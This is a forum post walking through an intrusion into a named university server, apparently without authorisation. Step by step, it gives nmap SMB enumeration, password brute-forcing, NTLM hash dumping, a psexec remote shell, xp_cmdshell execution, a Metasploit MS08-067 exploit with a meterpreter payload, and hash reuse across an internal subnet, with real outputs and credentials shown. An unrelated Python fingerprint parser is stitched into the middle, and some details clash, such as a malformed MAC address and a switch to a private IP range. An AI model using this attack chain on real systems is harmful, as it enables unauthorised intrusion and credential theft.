nmap+msf intrusion of Guangxi Normal University

Views: 3975 | Replies: 0
Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
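Reading the fingerprint block above by eye is tedious, so here is an added Python example (not part of the original post) that parses an nmap "SF-Port" service fingerprint into probe -> response bytes and checks each declared length (hex) against the decoded data. The sample is the page's own fingerprint for 3372/tcp; the function and variable names are mine.

```python
import re

# Constructed sample: the fingerprint nmap printed for 3372/tcp on this page.
SAMPLE_FP = r'''SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");'''

_HEAD = re.compile(r"SF-Port(\d+)-(TCP|UDP):(.*)")
# one response record: %r(ProbeName,<hex length>,"<escaped bytes>")
_RESP = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
_SIMPLE_ESC = {"n": 0x0A, "r": 0x0D, "t": 0x09, "\\": 0x5C, '"': 0x22}


def _unescape(s: str) -> bytes:
    """Decode nmap's C-style escapes (\\n, \\r, \\t, \\\\, \\", \\xHH) into raw bytes."""
    out = bytearray()
    i = 0
    while i < len(s):
        ch = s[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
        elif s[i + 1] == "x":
            out.append(int(s[i + 2:i + 4], 16))
            i += 4
        else:
            out.append(_SIMPLE_ESC.get(s[i + 1], ord(s[i + 1])))
            i += 2
    return bytes(out)


def parse_service_fingerprint(text: str) -> dict:
    """Join the SF-/SF: lines, split header fields, and decode every probe response."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    head = _HEAD.match(lines[0])
    if head is None:
        raise ValueError("not an SF-Port fingerprint")
    # continuation lines carry an 'SF:' prefix that is not part of the data
    body = head.group(3) + "".join(ln[3:] for ln in lines[1:] if ln.startswith("SF:"))
    header, _, _ = body.partition("%r(")
    fields = dict(kv.split("=", 1) for kv in header.split("%") if "=" in kv)
    responses = {}
    for probe, hexlen, data in _RESP.findall(body):
        raw = _unescape(data)
        if len(raw) != int(hexlen, 16):
            raise ValueError(f"{probe}: declared {int(hexlen, 16)} bytes, decoded {len(raw)}")
        responses[probe] = raw
    return {"port": int(head.group(1)), "proto": head.group(2),
            "fields": fields, "responses": responses}


def distinct_responses(fp: dict) -> set:
    """Distinct byte strings the service sent back; a single value means it ignores probe content."""
    return set(fp["responses"].values())


if __name__ == "__main__":
    fp = parse_service_fingerprint(SAMPLE_FP)
    for probe, raw in fp["responses"].items():
        print(f"{probe:20s} {raw!r}")
    print("distinct replies:", distinct_responses(fp))
```

On this sample all eight probes (HTTP, RTSP, SSL, SIP, LPD and so on) get the identical six-byte reply, which is why nmap could not classify the service: it answers the same thing regardless of what is sent.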
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the ms08-067 vulnerability on the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to try logging in across the whole internal network segment

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~